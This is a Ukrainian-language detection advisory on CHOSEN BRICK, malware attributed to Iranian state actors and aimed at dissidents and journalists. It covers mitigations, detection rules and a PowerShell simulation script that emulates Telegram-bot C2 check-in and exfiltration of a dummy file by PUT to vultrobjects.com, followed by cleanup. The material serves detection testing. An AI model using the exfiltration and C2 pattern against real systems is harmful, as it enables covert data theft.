Іранське кіберпригромування дисидентів, активістів та журналістів
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Іранські актори, які підтримуються державою, використовують шкідливе ПЗ CHOSEN BRICK для націлювання на дисидентів, активістів і журналістів у всьому світі. Шкідливе ПЗ доставляється через соціальну інженерію на таких платформах, як WhatsApp і Telegram, часто маскуючись під легальні програми або файли. Після встановлення CHOSEN BRICK підтримує крадіжку даних, запис з мікрофона та стирання системи через Telegram-управління та контроль.
Розслідування
Розслідування виявило повторювану схему соціальної інженерії, за якою слідує розгортання CHOSEN BRICK на системах Windows. Аналітики спостерігали, як шкідливе ПЗ використовує ботів Telegram для зв’язку C2 і служби зберігання хмарних даних для витоку даних. Стійкість встановлюється через певні ключі запуску в реєстрі, а виключення в Microsoft Defender додаються для уникнення засобів безпеки.
Пом’якшення
Рекомендовані заходи включають покращення обізнаності користувачів про методи соціальної інженерії та уникнення програмного забезпечення, яке надається через небажані вкладення. Організації також повинні запровадити двофакторну аутентифікацію, стійку до фішинг-атак, впровадити белий список застосунків і підтримувати антивірусне програмне забезпечення в актуальному стані. Моніторинг підозрілих з’єднань з Telegram і відомими провайдерами хмарного зберігання може додатково зміцнити виявлення.
Реагування
Якщо виявлено активність CHOSEN BRICK, організації повинні співпрацювати зі своїми ІТ-провайдерами для перегляду журналів кінцевих точок на наявність відповідних ключів реєстру та шляхів до файлів. Повинні бути перевірені як корпоративні, так і особисті пристрої, якими користуються високоризикові особи. Команди безпеки також повинні здійснювати пошук доменів, імен файлів та інших технічних показників, пов’язаних з кампанією.
Потік атаки
Ми ще оновлюємо цю частину.
Виявлення
Можливі точки збереження [ASEPs – Hive програмне забезпечення/NTUSER] (через подію реєстру)
Можливе використання Telegram як каналу управління та контролю (через dns_query)
Використання CHOSEN BRICK Telegram та VultrObjects для шкідливих комунікацій [З’єднання з Windows мережею]
Виявлення стійкості CHOSEN BRICK через ключ Run у реєстрі [Подія реєстру Windows]
Виконання симуляції
-
Атака розповідь і команди: Супротивник намагається встановити командування і контроль (C2) та вивести конфіденційні дані. Щоб уникнути традиційного антивірусного підпису, вони використовують легальні веб-сервіси. Спочатку зловмисник виконує команду для “check-in” з сервером C2 через API Telegram (
api.telegram.org). Після цього зловмисник симулює вивід конфіденційного файлу, завантажуючи його в сховище наvultrobjects.com. Ці дії виконуються за допомогою стандартних веб-запитів для змішування з легітимним зашифрованим веб-трафіком, сподіваючись уникнути перевірки та бути поміченими лише якщо відомі специфічні IoCs. -
Скрипт регресійного тестування:
# Скрипт симуляції: Емуляція TTP CHOSEN BRICK # Цей скрипт симулює C2 через Telegram та виведення даних через VultrObjects $C2_Domain = "api.telegram.org" $Exfil_Domain = "vultrobjects.com" Write-Host "[+] Початок симуляції: Емуляція TTP CHOSEN BRICK..." -ForegroundColor Cyan # 1. Симуляція C2 Чек-ін (Телеграм API) Write-Host "[*] Крок 1: Симуляція чек-іну C2 до $C2_Domain" -ForegroundColor Yellow try { $c2_response = Invoke-WebRequest -Uri "https://$C2_Domain/bot123456:ABC-DEF/getUpdates" -Method Get -ErrorAction SilentlyContinue Write-Host "[+] Запит C2 відправлено." -ForegroundColor Green } catch { Write-Host "[!] Примітка: З'єднання не вдалось (очікувано, якщо немає інтернету/проксі), але телеметрія все одно повинна бути згенерована." -ForegroundColor Gray } # 2. Симуляція виводу даних (VultrObjects) Write-Host "[*] Крок 2: Симуляція виводу даних до $Exfil_Domain" -ForegroundColor Yellow $dummy_data = "Це конфіденційна інформація, яка виводиться." $dummy_file = "$env:TEMPsensitive_data.txt" $dummy_data | Out-File -FilePath $dummy_file try { # Симуляція PUT-запиту до кінцевої точки зберігання в хмарі Invoke-RestMethod -Uri "https://$Exfil_Domain/exfil/data_dump.txt" -Method Put -Body $dummy_data -ContentType "text/plain" -ErrorAction SilentlyContinue Write-Host "[+] Запит на виведення відправлено." -ForegroundColor Green } catch { Write-Host "[!] Примітка: З'єднання не вдалось (очікувано, якщо немає інтернету/проксі), але телеметрія все одно повинна бути згенерована." -ForegroundColor Gray } Write-Host "[+] Симуляція завершена. Перевірте SIEM на наявність проксі-журналів із $C2_Domain та $Exfil_Domain." -ForegroundColor Cyan -
Команди очистки:
# Скрипт очистки $dummy_file = "$env:TEMPsensitive_data.txt" if (Test-Path $dummy_file) { Remove-Item -Path $dummy_file -Force Write-Host "[+] Очистка: Видалено файл дипломування." -ForegroundColor Green } else { Write-Host "[!] Очистка: Файл не знайдено." -ForegroundColor Yellow }